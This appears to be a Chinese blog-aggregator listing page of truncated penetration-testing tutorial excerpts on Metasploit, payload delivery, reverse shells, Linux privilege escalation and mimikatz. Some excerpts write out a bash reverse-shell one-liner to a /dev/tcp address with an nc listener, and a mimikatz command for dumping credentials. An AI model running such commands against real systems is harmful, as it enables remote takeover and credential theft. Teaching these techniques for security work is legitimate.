它位于/usr/share/metasploit-framework 进入到modules目录,有六大模块 exploits:系统漏洞利用的流程,对系统漏洞注入一些特定的代码,使其覆盖程序执行寄存器,使电脑运行我们想让它执行的动作(比如反弹shell),对应每一个漏洞的利用代码。包括针对linux系 ...
分类:
Web程序 时间:
2017-04-26 19:09:37
阅读次数:
179
veil-catapult进行payload投放,直接使payload在内存中执行。 powershell工作原理:从kali先发一个powershell脚本到目标主机上,再发一个反弹shell到目标主机,再发一个指令给powershell,powershell通知反弹shell连接kali,之后就 ...
分类:
其他好文 时间:
2017-04-24 18:17:36
阅读次数:
256
来源:https://github.com/dairoot/Shell-rebound/blob/master/back.pysec.net/nc.py ...
分类:
编程语言 时间:
2016-12-18 09:43:04
阅读次数:
263
一、演示一下反弹shell的效果0、看一下python版本1、我们这边是服务端客户端连接后就可以输入命令了,比如下面截图中输入的pwd2、目标机是客户端,输入ip和端口二、代码+注释0、服务端1、客户端
分类:
编程语言 时间:
2016-12-15 01:20:03
阅读次数:
227
bash shell反弹脚本 Python shell 反弹脚本 利用方式,保存成back.sh 或者back.py ,通过远程下载执行即可利用! 借鉴: https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/ http://pente ...
分类:
系统相关 时间:
2016-12-07 14:02:04
阅读次数:
555
Linux下的漏洞提权 linux下一般都是系统漏洞提权,分为以下几个步骤: 提权 反弹shell 本地:nc -l -p 8000 目标机器:/bin/bash -i >& /dev/tcp/10.10.10.10/8000 0>&1 实例 1、得到系统版本号 centos 7 local roo ...
分类:
系统相关 时间:
2016-09-02 18:58:05
阅读次数:
369
原理 实验环境: 攻击机:windows机器,IP:192.168.12.109 受害机:linux机器,IP:192.168.79.1 攻击机:设置本地监听端口2222 C:\netcat>nc -l -p 2222 受害机:反弹/bin/bash 到攻击机(192.168.12.109)的222
分类:
Web程序 时间:
2016-02-06 14:21:28
阅读次数:
546
有些时候无法反弹shell执行mimikatz,虽然可以用procdump导出lsass的内存dump文件,之后本地获取明文密码,但多少有点麻烦,其实mimikatz也支持命令行直接导出mimikatz.exe privilege::debug "log filename.log" sekurlsa...
分类:
其他好文 时间:
2015-07-11 15:08:01
阅读次数:
231
1、打开setoolkit输入我们反弹shell的地址与端口2、修改我的shellcode3、攻击成功
分类:
系统相关 时间:
2015-04-28 20:44:34
阅读次数:
492